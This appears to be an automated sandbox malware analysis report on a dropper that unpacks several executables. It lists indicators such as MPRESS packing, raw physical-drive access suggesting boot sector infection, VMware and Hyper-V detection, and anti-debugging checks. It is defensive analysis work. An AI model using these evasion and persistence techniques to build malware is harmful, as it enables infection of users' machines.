Source: Binary string: msctf.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbk source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: D:\Projects\crxinstall\trunk\Release\spoofpref.pdb5 source: askinstall21.exe
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: winspool.pdbk source: WerFault.exe, 00000004.00000003.245677831.0000000005580000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270108599.0000000004BF0000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb. source: WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb} source: Setup.exe, 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp
Source: Binary string: D:\Projects\crxinstall\trunk\Release\spoofpref.pdb source: askinstall21.exe
Source: Binary string: powrprof.pdbW source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000004.00000003.245673054.0000000005451000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270093131.0000000004A11000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Operations\Source\Workspaces\Sib\Sibl\Release\Sibuia.pdb source: Setup.exe, 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 00000004.00000003.245684344.0000000005586000.00000004.00000040.sdmp, WerFault.exe, 00000007.00000003.270123945.0000000004BF6000.00000004.00000040.sdmp
Source: KeJ7Cl7flZ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: KeJ7Cl7flZ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: KeJ7Cl7flZ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: KeJ7Cl7flZ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: KeJ7Cl7flZ.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe | Unpacked PE file: 26.2.jg2_2qua.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Unpacked PE file: 19.2.aliens.exe.3310000.5.unpack
Binary contains a suspicious time stamp
Source: initial sample | Static PE information: 0xBD323864 [Sat Aug 2 06:04:20 2070 UTC]
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe | Code function: 1_2_01262070 IsBadReadPtr,LoadLibraryA,GetProcAddress,IsBadReadPtr,Sleep,
Source: initial sample | Static PE information: section where entry point is pointing to: .MPRESS2
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4900203
Source: KeJ7Cl7flZ.exe | Static PE information: real checksum: 0x0 should be: 0x795ef5
Source: 85F91A36E275562F.exe.19.dr | Static PE information: real checksum: 0xcf3f0 should be:
Source: aliens.exe.17.dr | Static PE information: real checksum: 0xcf3f0 should be:
Source: 002.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1479d3
Source: jg2_2qua.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x90533
Source: jg2_2qua.exe.26.dr | Static PE information: real checksum: 0x0 should be: 0x90533
Source: Setup.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x40e92a
Source: KeJ7Cl7flZ.exe | Static PE information: section name: .didat
Source: jg2_2qua.exe.0.dr | Static PE information: section name: .MPRESS1
Source: jg2_2qua.exe.0.dr | Static PE information: section name: .MPRESS2
Source: jg2_2qua.exe.26.dr | Static PE information: section name: .MPRESS1
Source: jg2_2qua.exe.26.dr | Static PE information: section name: .MPRESS2
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Code function: 0_2_00ED4066 push ecx; ret
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe | Code function: 0_2_00ED3344 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe | Code function: 1_2_01285B48 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe | Code function: 1_2_01283AF5 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe | Code function: 1_2_1008CAD5 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe | Code function: 1_2_10082CFE push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe | Code function: 15_2_6FEDF9A8 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe | Code function: 17_2_0006E0E4 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe | Code function: 17_2_0006EBA6 push ecx; ret
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe | Code function: 19_2_10010579 push ecx; ret
Source: initial sample | Static PE information: section name: .MPRESS1 entropy: 7.99955674607
Source: initial sample | Static PE information: section name: .MPRESS1 entropy: 7.99955674607

Persistence and Installation Behavior:

Contains functionality to infect the boot sector
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Drops PE files to the document folder of the user
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe File created: C:\Users\user\Documents\VlcpVideoV1.0.1\jg2_2qua.exe
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe File created: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe File created: C:\ProgramData\sib\{F9266136-0000-46F8-BC66-FDD9185E4296}\SibClr.dll
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exe
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\SSSS.exe
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\BTRSetp.exe
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe File created: C:\Users\user\AppData\Local\Temp\nsq2FFD.tmp\Sibuia.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe File created: C:\Users\user\AppData\Local\Temp\sib309A.tmp\SibClr.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe File created: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exe
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exe
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exe
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe File created: C:\Users\user\AppData\Local\Temp\85F91A36E275562F.exe
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Setup.exe.log

Boot Survival:

Contains functionality to infect the boot sector
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe Code function: 1_2_01261890 IsIconic,_memset,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe Code function: 1_2_0128615A RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\WerFault.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicket
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_00444078
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_100202D0
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe Dropped PE file which has not been started: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\hjjgaa.exe
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\SSSS.exe
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\BTRSetp.exe
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\askinstall21.exe
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\file1.exe
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\ubisoftpro.exe
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\85F91A36E275562F.exe
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe TID: 5720 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WerFault.exe File opened: PhysicalDrive0
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_100223C0 GetLocalTime followed by cmp: cmp ecx, 01h and CTI: jl 10022474h
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_100223C0 GetLocalTime followed by cmp: cmp edx, 08h and CTI: jnle 10022474h
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Code function: 0_2_00EC29A3 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Code function: 0_2_00ED0BA0 SendDlgItemMessageW,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Code function: 0_2_00EDFB78 FindFirstFileExA,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Code function: 0_2_00ED2E67 VirtualQuery,GetSystemInfo,FindFirstFileExA,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe Code function: 1_2_012746B9 __EH_prolog3_GS,GetFullPathNameA,__cftof,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,_strlen,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe Code function: 1_2_10009DF3 _memset,GetEnvironmentVariableW,_wprintf,FindFirstFileW,__snprintf_s,FindNextFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe Code function: 15_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe Code function: 15_2_00406301 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe Code function: 15_2_6FEE0F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe Code function: 15_2_6FED1C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe Code function: 17_2_0005A534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe Code function: 17_2_0006B820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe Code function: 17_2_0007A928 FindFirstFileExA,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_0045DD7C FindFirstFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW9x
Source: WerFault.exe, 00000007.00000002.282007693.0000000004742000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWx
Source: WerFault.exe, 00000004.00000002.256297589.00000000051C0000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.282285253.0000000004B00000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 00000004.00000002.256232825.00000000050ED000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW-
Source: WerFault.exe, 00000004.00000003.253459157.0000000005187000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000002.281941675.0000000004685000.00000004.00000001.sdmp, aliens.exe, 00000013.00000002.508576720.0000000000BB7000.00000004.00000020.sdmp, jg2_2qua.exe, 0000001A.00000002.506529883.000000000071B000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: aliens.exe, 00000013.00000002.508446733.0000000000B6A000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW(X
Source: aliens.exe, 00000013.00000002.507967540.00000000008CC000.00000004.00000001.sdmp Binary or memory string: VMware Virtual disk 2.0
Source: aliens.exe, 00000013.00000002.507967540.00000000008CC000.00000004.00000001.sdmp Binary or memory string: VMware
Source: WerFault.exe, 00000004.00000002.256297589.00000000051C0000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.282285253.0000000004B00000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000004.00000002.256297589.00000000051C0000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.282285253.0000000004B00000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: jg2_2qua.exe, 0000001A.00000003.498781258.00000000040A8000.00000004.00000001.sdmp Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20200930T144711Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=93ad7adba3804ae29988afa9c571d584&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663612&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663612&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: WerFault.exe, 00000004.00000002.256297589.00000000051C0000.00000002.00000001.sdmp, WerFault.exe, 00000007.00000002.282285253.0000000004B00000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\WerFault.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe Code function: 1_2_01269311 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3,LdrInitializeThunk,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Code function: 0_2_00EDD6D2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe Code function: 1_2_0126294A OutputDebugStringA,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe Code function: 1_2_012865B6 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe Code function: 1_2_01262070 IsBadReadPtr,LoadLibraryA,GetProcAddress,IsBadReadPtr,Sleep,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Code function: 0_2_00EDC507 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe Code function: 15_2_6FEF2571 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe Code function: 15_2_6FEF80EB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe Code function: 17_2_00077363 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_004175F6 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\ujvqkl7ofji6\aliens.exe Code function: 19_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Code function: 0_2_00EE07E0 GetProcessHeap,
Source: C:\Windows\SysWOW64\WerFault.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sib309A.tmp\0\setup.exe' -s
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Code function: 0_2_00ED3FBC SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\KeJ7Cl7flZ.exe Code function: 0_2_00ED431B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
